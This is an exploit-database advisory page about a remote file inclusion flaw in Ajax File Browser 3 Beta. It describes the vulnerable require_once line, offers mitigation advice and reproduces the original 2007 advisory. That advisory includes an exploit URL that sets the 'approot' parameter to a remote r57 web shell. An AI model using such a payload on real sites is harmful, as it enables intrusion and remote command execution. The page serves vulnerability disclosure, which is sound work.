header-logo
Suggest Exploit
vendor:
Ajax File Browser
by:
arfis project
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Ajax File Browser
Affected Version From: 3 Beta
Affected Version To: 3 Beta
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Ajax File Browser 3 Beta Remote File Inclusion

The vulnerability exists in the _includes/settings.inc.php file of Ajax File Browser 3 Beta. The code on line 12 includes a file using the require_once function without properly sanitizing user input. An attacker can exploit this vulnerability by providing a malicious URL in the 'approot' parameter, leading to remote file inclusion.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized before using it in file inclusion functions. Additionally, consider using a whitelist approach for allowed file paths.
Source

Exploit-DB raw data:

Ajax File Browser 3 Beta Remote File Inclusion
##############################################

                                                found by the "arfis project"
                                                http://arfis.wordpress.com/

Project Info:
-------------
	Name: Ajax File Browser
	Link: http://sourceforge.net/projects/ajaxfb/
	DL:   http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
	File: _includes/settings.inc.php
	Line: 12
	Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
	http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
	"arfis" stands for "automated Remote File Inclusion search". It's a perl script
	that automatically download and extract PHP projects from sourceforge.net. It then
	checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
	blog, or database if you want to call it like that. Feel free to come around and
	find your own RFI:
	                   http://arfis.wordpress.com/

# milw0rm.com [2007-09-14]

Navigation

Suggest Exploit

Services By CQR